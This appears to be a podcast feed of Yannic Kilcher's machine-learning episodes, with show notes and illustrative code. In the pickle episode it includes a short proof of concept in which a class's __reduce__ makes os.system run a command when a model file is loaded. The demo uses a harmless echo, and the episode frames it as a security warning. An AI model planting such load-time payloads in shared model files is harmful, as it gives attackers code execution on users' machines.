
Yannic Kilcher Videos (Audio Only)
I make videos about machine learning research papers, programming, issues of the AI community, and the broader impact of AI on society.
Twitter: https://twitter.com/ykilcher
Discord: https://discord.gg/4H8xxDF
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar (preferred to Patreon): https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Latest episodes

Oct 23, 2022 • 55min
This is a game changer! (AlphaTensor by DeepMind explained)
#alphatensor #deepmind #ai
Matrix multiplication is the most used mathematical operation in all of science and engineering. Speeding this up has massive consequences. Thus, over the years, this operation has become more and more optimized. A fascinating discovery was made when it was shown that one actually needs fewer than N^3 multiplication operations to multiply two NxN matrices. DeepMind goes a step further and creates AlphaTensor, a Deep Reinforcement Learning algorithm that plays a single-player game, TensorGame, in order to find even more optimized algorithms for matrix multiplication. And it turns out there exists a plethora of undiscovered matrix multiplication algorithms, which will not only make everything from computers to smart toasters faster, but also bring new insights into fundamental math and complexity theory.
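To see where the savings come from: Strassen's construction multiplies two 2x2 (block) matrices with 7 products instead of 8, and applying it recursively to the blocks drives the exponent below 3. A minimal NumPy sketch of the classic algorithm (illustrative only, not DeepMind's code):

```python
import numpy as np

def strassen(A, B):
    """Multiply two 2^n x 2^n matrices using 7 recursive products instead of 8."""
    n = A.shape[0]
    if n == 1:
        return A * B
    h = n // 2
    A11, A12, A21, A22 = A[:h, :h], A[:h, h:], A[h:, :h], A[h:, h:]
    B11, B12, B21, B22 = B[:h, :h], B[:h, h:], B[h:, :h], B[h:, h:]
    M1 = strassen(A11 + A22, B11 + B22)
    M2 = strassen(A21 + A22, B11)
    M3 = strassen(A11, B12 - B22)
    M4 = strassen(A22, B21 - B11)
    M5 = strassen(A11 + A12, B22)
    M6 = strassen(A21 - A11, B11 + B12)
    M7 = strassen(A12 - A22, B21 + B22)
    C = np.empty_like(A)
    C[:h, :h] = M1 + M4 - M5 + M7  # C11
    C[:h, h:] = M3 + M5            # C12
    C[h:, :h] = M2 + M4            # C21
    C[h:, h:] = M1 - M2 + M3 + M6  # C22
    return C

A = np.random.randint(0, 10, (4, 4))
B = np.random.randint(0, 10, (4, 4))
assert np.array_equal(strassen(A, B), A @ B)
```

Each recursion level trades one multiplication for a handful of cheap additions, which is exactly the trade-off the video walks through.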
Sponsor: Assembly AI
Link: https://www.assemblyai.com/?utm_source=youtube&utm_medium=social&utm_campaign=yannic_sentiment
OUTLINE:
0:00 - Intro
1:50 - Sponsor: Assembly AI (link in description)
3:25 - What even is Matrix Multiplication?
6:10 - A very astounding fact
8:45 - Trading multiplications for additions
12:35 - Matrix Multiplication as a Tensor
17:30 - Tensor Decompositions
20:30 - A formal way of finding multiplication algorithms
31:00 - How to formulate this as a game?
39:30 - A brief primer on AlphaZero / MCTS
45:40 - The Results
48:15 - Optimizing for different hardware
52:40 - Expanding fundamental math
53:45 - Summary & Final Comments
Paper: https://www.nature.com/articles/s41586-022-05172-4
Title: Discovering faster matrix multiplication algorithms with reinforcement learning
Abstract:
Improving the efficiency of algorithms for fundamental computations can have a widespread impact, as it can affect the overall speed of a large amount of computations. Matrix multiplication is one such primitive task, occurring in many systems—from neural networks to scientific computing routines. The automatic discovery of algorithms using machine learning offers the prospect of reaching beyond human intuition and outperforming the current best human-designed algorithms. However, automating the algorithm discovery procedure is intricate, as the space of possible algorithms is enormous. Here we report a deep reinforcement learning approach based on AlphaZero for discovering efficient and provably correct algorithms for the multiplication of arbitrary matrices. Our agent, AlphaTensor, is trained to play a single-player game where the objective is finding tensor decompositions within a finite factor space. AlphaTensor discovered algorithms that outperform the state-of-the-art complexity for many matrix sizes. Particularly relevant is the case of 4 × 4 matrices in a finite field, where AlphaTensor’s algorithm improves on Strassen’s two-level algorithm for the first time, to our knowledge, since its discovery 50 years ago. We further showcase the flexibility of AlphaTensor through different use-cases: algorithms with state-of-the-art complexity for structured matrix multiplication and improved practical efficiency by optimizing matrix multiplication for runtime on specific hardware. Our results highlight AlphaTensor’s ability to accelerate the process of algorithmic discovery on a range of problems, and to optimize for different criteria.
Authors: Alhussein Fawzi, Matej Balog, Aja Huang, Thomas Hubert, Bernardino Romera-Paredes, Mohammadamin Barekatain, Alexander Novikov, Francisco J. R. Ruiz, Julian Schrittwieser, Grzegorz Swirszcz, David Silver, Demis Hassabis & Pushmeet Kohli
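To make the paper's central reframing concrete: a rank-R decomposition of the matrix multiplication tensor is exactly a multiplication algorithm using R multiplications, and TensorGame is the search for low-rank decompositions. Below, a small NumPy check that Strassen's factors (transcribed by hand here; the factors AlphaTensor itself discovers are reported with the paper) reconstruct the 2x2 matmul tensor:

```python
import numpy as np

# T[a, b, c] = 1 iff (entry a of A) * (entry b of B) contributes to entry c of C,
# for 2x2 matrices flattened row-major: C[i, j] = sum_k A[i, k] * B[k, j].
T = np.zeros((4, 4, 4), dtype=int)
for i in range(2):
    for j in range(2):
        for k in range(2):
            T[2 * i + k, 2 * k + j, 2 * i + j] = 1

# Strassen's 7 factor triples: row r gives the coefficients of the r-th
# product (U over A's entries, V over B's, W over C's).
U = np.array([[1,0,0,1], [0,0,1,1], [1,0,0,0], [0,0,0,1],
              [1,1,0,0], [-1,0,1,0], [0,1,0,-1]])
V = np.array([[1,0,0,1], [1,0,0,0], [0,1,0,-1], [-1,0,1,0],
              [0,0,0,1], [1,1,0,0], [0,0,1,1]])
W = np.array([[1,0,0,1], [0,0,1,-1], [0,1,0,1], [1,0,1,0],
              [-1,1,0,0], [0,0,0,1], [1,0,0,0]])

# Rank-7 reconstruction: sum_r u_r (outer) v_r (outer) w_r equals T exactly,
# which is precisely a 7-multiplication algorithm for 2x2 matmul.
assert np.array_equal(np.einsum('ri,rj,rk->ijk', U, V, W), T)
```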

Oct 23, 2022 • 27min
[ML News] Stable Diffusion Takes Over! (Open Source AI Art)
#stablediffusion #aiart #mlnews
Stable Diffusion has been released and is riding a wave of creativity and collaboration. But not everyone is happy about this...
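For anyone who wants to try it themselves: a minimal text-to-image sketch using Hugging Face's diffusers library. The checkpoint name matches the v1.4 release; treat this as a sketch rather than an official quickstart, and note that you may first need to accept the model license on the Hub:

```python
import torch
from diffusers import StableDiffusionPipeline

# Load the v1.4 checkpoint (accept its license on the Hub and log in
# via `huggingface-cli login` first if prompted).
pipe = StableDiffusionPipeline.from_pretrained(
    "CompVis/stable-diffusion-v1-4", torch_dtype=torch.float16
)
pipe = pipe.to("cuda")  # at fp16 this fits in roughly 8 GB of VRAM

image = pipe("an astronaut riding a horse, oil painting").images[0]
image.save("astronaut.png")
```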
Sponsor: NVIDIA
GPU Raffle: https://ykilcher.com/gtc
OUTLINE:
0:00 - Introduction
0:30 - What is Stable Diffusion?
2:25 - Open-Source Contributions and Creations
7:55 - Textual Inversion
9:30 - OpenAI vs Open AI
14:20 - Journalists be outraged
16:20 - AI Ethics be even more outraged
19:45 - Do we need a new social contract?
21:30 - More applications
22:55 - Helpful Things
23:45 - Sponsor: NVIDIA (& how to enter the GPU raffle)
References: https://early-hair-c20.notion.site/Stable-Diffusion-Takes-Over-Referenes-7a2f45b8f7e04ae0ba19dbfcd2b7f7c0
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Oct 23, 2022 • 50min
How to make your CPU as fast as a GPU - Advances in Sparsity w/ Nir Shavit
#ai #sparsity #gpu
Sparsity is awesome, but only recently has it become possible to properly handle sparse models at good performance. Neural Magic does exactly this, using a plain CPU. No specialized hardware needed, just clever algorithms for pruning and forward-propagation of neural networks. Nir Shavit and I talk about how this is possible, what it means in terms of applications, and why sparsity should play a much larger role in the Deep Learning community.
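As a concrete reference point for the pruning discussion, here is a minimal sketch of unstructured magnitude pruning in PyTorch. This is the textbook idea only, not Neural Magic's actual pipeline (their DeepSparse runtime is linked below):

```python
import torch

def magnitude_prune(weight: torch.Tensor, sparsity: float) -> torch.Tensor:
    """Zero out the smallest-magnitude fraction of weights (unstructured pruning)."""
    k = int(sparsity * weight.numel())
    threshold = weight.abs().flatten().kthvalue(k).values
    return weight * (weight.abs() > threshold)

w = torch.randn(512, 512)
w_sparse = magnitude_prune(w, sparsity=0.9)
print(f"nonzero fraction: {(w_sparse != 0).float().mean().item():.2%}")  # ~10%
```

The episode's argument is that once most weights are zero, a CPU with clever kernels can skip them entirely, while dense GPU kernels largely cannot.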
Sponsor: AssemblyAI
Link: https://www.assemblyai.com/?utm_sourc...
Check out Neural Magic: https://neuralmagic.com/
and DeepSparse: https://github.com/neuralmagic/deepsp...
OUTLINE:
0:00 Introduction
1:08 Sponsor: AssemblyAI
2:50 Start of Interview
4:15 How Nir's company, Neural Magic, was founded
5:10 What is Sparsity about?
9:30 Link between the human brain and sparsity
12:10 Where should the extra resources that the human brain doesn't have go?
14:40 Analogy for Sparse Architecture
16:48 Possible future for Sparse Architecture as standard architecture for Neural Networks
20:08 Pruning & Sparsification
22:57 What keeps us from building sparse models?
25:34 Why are GPUs so unsuited for sparse models?
28:47 CPU and GPU in connection with memory
30:14 What does Neural Magic do?
32:54 How do you deal with overlaps in tensor columns?
33:41 The best type of sparsity to execute on a CPU
37:24 What kind of architecture would make the best use out of a combined system of CPUs and GPUs?
41:04 Graph Neural Networks in connection to sparsity
43:04 Intrinsic connection between the Sparsification of Neural Networks, Non Layer-Wise Computation, Blockchain Technology, Smart Contracts and Distributed Computing
45:23 Neural Magic's target audience
48:16 Is there a type of model where it works particularly well, and a type where it doesn't?
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Sep 15, 2022 • 1h 7min
More Is Different for AI - Scaling Up, Emergence, and Paperclip Maximizers (w/ Jacob Steinhardt)
#ai #interview #research
Jacob Steinhardt believes that future AI systems will be qualitatively different than the ones we know currently. We talk about how emergence happens when scaling up, what implications that has on AI Safety, and why thought experiments like the Paperclip Maximizer might be more useful than most people think.
OUTLINE:
0:00 Introduction
1:10 Start of Interview
2:10 Blog posts series
3:56 More Is Different for AI (Blog Post)
7:40 Do you think this emergence is mainly a property of the interaction of things?
9:17 How does phase transition or scaling-up play into AI and Machine Learning?
12:10 GPT-3 as an example of qualitative difference in scaling up
14:08 GPT-3's in-context learning as an emergent phenomenon
15:58 Brief introduction of different viewpoints on the future of AI and its alignment
18:51 How does the phenomenon of emergence play into this game between the Engineering and the Philosophy viewpoint?
22:41 Paperclip Maximizer on AI safety and alignment
31:37 Thought Experiments
37:34 Imitative Deception
39:30 TruthfulQA: Measuring How Models Mimic Human Falsehoods (Paper)
42:24 ML Systems Will Have Weird Failure Modes (Blog Post)
51:10 Is there any work to get a system to be deceptive?
54:37 Empirical Findings Generalize Surprisingly Far (Blog Post)
1:00:18 What would you recommend to guarantee better AI alignment or safety?
1:05:13 Remarks
References:
https://bounded-regret.ghost.io/more-is-different-for-ai/
https://docs.google.com/document/d/1FbTuRvC4TFWzGYerTKpBU7FJlyvjeOvVYF2uYNFSlOc/edit#heading=h.n1wk9bxo847o
Links:
TabNine Code Completion (Referral): http://bit.ly/tabnine-yannick
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
BitChute: https://www.bitchute.com/channel/yannic-kilcher
LinkedIn: https://www.linkedin.com/in/ykilcher
BiliBili: https://space.bilibili.com/2017636191
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Sep 7, 2022 • 20min
The hidden dangers of loading open-source AI models (ARBITRARY CODE EXPLOIT!)
#huggingface #pickle #exploit
Did you know that something as simple as loading a model can execute arbitrary code on your machine?
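To see the mechanism, here is a minimal and deliberately harmless demonstration of what pickle allows. A PyTorch checkpoint is essentially a pickle archive, so the same hook fires when a booby-trapped model is loaded:

```python
import os
import pickle
import pickletools

class Payload:
    def __reduce__(self):
        # pickle will call os.system("...") at LOAD time.
        # A harmless echo here; an attacker can put any shell command.
        return (os.system, ("echo arbitrary code ran on load!",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # merely loading the bytes executes the command

# Inspect a suspicious pickle WITHOUT executing it:
pickletools.dis(blob)
```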
Try the model: https://huggingface.co/ykilcher/total...
Get the code: https://github.com/yk/patch-torch-save
Sponsor: Weights & Biases
Go here: https://wandb.me/yannic
OUTLINE:
0:00 - Introduction
1:10 - Sponsor: Weights & Biases
3:20 - How Hugging Face models are loaded
5:30 - From PyTorch to pickle
7:10 - Understanding how pickle saves data
13:00 - Executing arbitrary code
15:05 - The final code
17:25 - How can you protect yourself?
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Aug 29, 2022 • 1h 2min
The Future of AI is Self-Organizing and Self-Assembling (w/ Prof. Sebastian Risi)
#ai #selforganization #emergence
Read Sebastian's article here: https://sebastianrisi.com/self_assemb...
OUTLINE:
0:00 - Introduction
2:25 - Start of Interview
4:00 - The intelligence of swarms
9:15 - The game of life & neural cellular automata
14:10 - What's missing from neural CAs?
17:20 - How does local computation compare to centralized computation?
25:40 - Applications beyond games and graphics
33:00 - Can we do away with goals?
35:30 - Where do these methods shine?
43:30 - The paradox of scales & brains
49:45 - Connections to graphical systems & GNNs
51:30 - Could this solve ARC?
57:45 - Where can people get started?
References:
https://sebastianrisi.com/
https://modl.ai/
https://sebastianrisi.com/self_assemb...
https://twitter.com/risi1979/status/1...
https://distill.pub/2020/growing-ca/
https://arxiv.org/abs/2201.12360
https://distill.pub/2020/selforg/mnist/
https://arxiv.org/pdf/2204.11674.pdf
https://github.com/fchollet/ARC
https://github.com/volotat/ARC-Game
http://animalaiolympics.com/AAI/
https://www.deepmind.com/publications...
https://melaniemitchell.me/BooksConte...
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Aug 29, 2022 • 26min
The Man behind Stable Diffusion
#stablediffusion #ai #stabilityai
An interview with Emad Mostaque, founder of Stability AI.
OUTLINE:
0:00 - Intro
1:30 - What is Stability AI?
3:45 - Where does the money come from?
5:20 - Is this the CERN of AI?
6:15 - Who gets access to the resources?
8:00 - What is Stable Diffusion?
11:40 - What if your model produces bad outputs?
14:20 - Do you employ people?
16:35 - Can you prevent the corruption of profit?
19:50 - How can people find you?
22:45 - Final thoughts, let's destroy PowerPoint
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Aug 3, 2022 • 14min
[ML News] BLOOM: 176B Open-Source | Chinese Brain-Scale Computer | Meta AI: No Language Left Behind
#mlnews #bloom #ai
Today we look at all the recent giant language models in the AI world!
OUTLINE:
0:00 - Intro
0:55 - BLOOM: Open-Source 176B Language Model
5:25 - YALM 100B
5:40 - Chinese Brain-Scale Supercomputer
7:25 - Meta AI Translates over 200 Languages
10:05 - Reproducibility Crisis Workshop
10:55 - AI21 Raises $64M
11:50 - Ian Goodfellow leaves Apple
12:20 - Andrej Karpathy leaves Tesla
12:55 - Wordalle
References:
BLOOM: Open-Source 176B Language Model
https://bigscience.huggingface.co/blo...
https://huggingface.co/spaces/bigscie...
https://huggingface.co/bigscience/blo...
YALM 100B
https://github.com/yandex/YaLM-100B
Chinese Brain-Scale Supercomputer
https://www.scmp.com/news/china/scien...
https://archive.ph/YaoA6#selection-12...
Meta AI Translates over 200 Languages
https://ai.facebook.com/research/no-l...
Reproducibility Crisis Workshop
https://reproducible.cs.princeton.edu/
AI21 Raises $64M
https://techcrunch.com/2022/07/12/ope...
Ian Goodfellow leaves Apple
https://twitter.com/goodfellow_ian/st...
Andrej Karpathy leaves Tesla
https://mobile.twitter.com/karpathy/s...
https://www.businessinsider.com/repor...
Wordalle
https://huggingface.co/spaces/hugging...
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Jul 10, 2022 • 1h
JEPA - A Path Towards Autonomous Machine Intelligence (Paper Explained)
Yann LeCun's position paper on a path towards machine intelligence combines Self-Supervised Learning, Energy-Based Models, and hierarchical predictive embedding models to arrive at a system that can teach itself to learn useful abstractions at multiple levels and use that as a world model to plan ahead in time.
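To make the core mechanism concrete, a toy JEPA sketch in PyTorch. The dimensions, the MLP predictor, and the squared-distance energy are illustrative choices, not prescriptions from the paper:

```python
import torch
import torch.nn as nn

class ToyJEPA(nn.Module):
    """Encode x and y separately, predict y's embedding from x's embedding
    plus a latent z, and score the pair by distance in embedding space."""
    def __init__(self, dim_in=64, dim_emb=32, dim_z=8):
        super().__init__()
        self.enc_x = nn.Sequential(nn.Linear(dim_in, dim_emb), nn.ReLU(),
                                   nn.Linear(dim_emb, dim_emb))
        self.enc_y = nn.Sequential(nn.Linear(dim_in, dim_emb), nn.ReLU(),
                                   nn.Linear(dim_emb, dim_emb))
        self.pred = nn.Sequential(nn.Linear(dim_emb + dim_z, dim_emb), nn.ReLU(),
                                  nn.Linear(dim_emb, dim_emb))

    def energy(self, x, y, z):
        sy_hat = self.pred(torch.cat([self.enc_x(x), z], dim=-1))
        return ((sy_hat - self.enc_y(y)) ** 2).mean(dim=-1)  # low = compatible

model = ToyJEPA()
x, y = torch.randn(16, 64), torch.randn(16, 64)
z = torch.randn(16, 8)  # latent: what about y is unpredictable from x alone
print(model.energy(x, y, z).shape)  # torch.Size([16])
```

Trained naively, both encoders can collapse to a constant embedding; the regularized (non-contrastive) methods the paper favors add variance/covariance-style terms precisely to rule this out.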
OUTLINE:
0:00 - Introduction
2:00 - Main Contributions
5:45 - Mode 1 and Mode 2 actors
15:40 - Self-Supervised Learning and Energy-Based Models
20:15 - Introducing latent variables
25:00 - The problem of collapse
29:50 - Contrastive vs regularized methods
36:00 - The JEPA architecture
47:00 - Hierarchical JEPA (H-JEPA)
53:00 - Broader relevance
56:00 - Summary & Comments
Paper: https://openreview.net/forum?id=BZ5a1...
Abstract: How could machines learn as efficiently as humans and animals? How could machines learn to reason and plan? How could machines learn representations of percepts and action plans at multiple levels of abstraction, enabling them to reason, predict, and plan at multiple time horizons? This position paper proposes an architecture and training paradigms with which to construct autonomous intelligent agents. It combines concepts such as configurable predictive world model, behavior driven through intrinsic motivation, and hierarchical joint embedding architectures trained with self-supervised learning.
Author: Yann LeCun
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Jun 28, 2022 • 33min
Video PreTraining (VPT): Learning to Act by Watching Unlabeled Online Videos (Paper Explained)
#openai #vpt #minecraft
Minecraft is one of the harder challenges any RL agent could face. Episodes are long, and the world is procedurally generated, complex, and huge. Further, the action space is a keyboard and a mouse, which must be operated given only the game's video input. OpenAI tackles this challenge using Video PreTraining, leveraging a small set of contractor data to pseudo-label a giant corpus of scraped gameplay footage. The pre-trained model is highly capable at basic game mechanics and can be fine-tuned much better than a blank-slate model. This is the first Minecraft agent that achieves the elusive goal of crafting a diamond pickaxe all by itself.
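As a rough schematic of the three-stage pipeline (a sketch only, not OpenAI's code; `idm`, `policy`, and the data iterables are assumed to be supplied):

```python
import torch
import torch.nn.functional as F

def train_idm(idm, labeled_clips):
    """Stage 1: the IDM sees past AND future frames, so inferring which
    key/mouse action was taken is far easier than choosing actions."""
    opt = torch.optim.Adam(idm.parameters())
    for frames, actions in labeled_clips:      # small contractor dataset
        loss = F.cross_entropy(idm(frames), actions)
        opt.zero_grad(); loss.backward(); opt.step()

def pseudo_label(idm, unlabeled_clips):
    """Stage 2: label roughly 70k hours of scraped gameplay with the IDM."""
    with torch.no_grad():
        return [(f, idm(f).argmax(dim=-1)) for f in unlabeled_clips]

def behavior_clone(policy, pseudo_labeled_clips):
    """Stage 3: the policy is causal (past frames only), like a real player."""
    opt = torch.optim.Adam(policy.parameters())
    for frames, actions in pseudo_labeled_clips:
        loss = F.cross_entropy(policy(frames), actions)
        opt.zero_grad(); loss.backward(); opt.step()
```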
OUTLINE:
0:00 - Intro
3:50 - How to spend money most effectively?
8:20 - Getting a large dataset with labels
14:40 - Model architecture
19:20 - Experimental results and fine-tuning
25:40 - Reinforcement Learning to the Diamond Pickaxe
30:00 - Final comments and hardware
Blog: https://openai.com/blog/vpt/
Paper: https://arxiv.org/abs/2206.11795
Code & Model weights: https://github.com/openai/Video-Pre-T...
Abstract:
Pretraining on noisy, internet-scale datasets has been heavily studied as a technique for training models with broad, general capabilities for text, images, and other modalities. However, for many sequential decision domains such as robotics, video games, and computer use, publicly available data does not contain the labels required to train behavioral priors in the same way. We extend the internet-scale pretraining paradigm to sequential decision domains through semi-supervised imitation learning wherein agents learn to act by watching online unlabeled videos. Specifically, we show that with a small amount of labeled data we can train an inverse dynamics model accurate enough to label a huge unlabeled source of online data -- here, online videos of people playing Minecraft -- from which we can then train a general behavioral prior. Despite using the native human interface (mouse and keyboard at 20Hz), we show that this behavioral prior has nontrivial zero-shot capabilities and that it can be fine-tuned, with both imitation learning and reinforcement learning, to hard-exploration tasks that are impossible to learn from scratch via reinforcement learning. For many tasks our models exhibit human-level performance, and we are the first to report computer agents that can craft diamond tools, which can take proficient humans upwards of 20 minutes (24,000 environment actions) of gameplay to accomplish.
Authors: Bowen Baker, Ilge Akkaya, Peter Zhokhov, Joost Huizinga, Jie Tang, Adrien Ecoffet, Brandon Houghton, Raul Sampedro, Jeff Clune
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n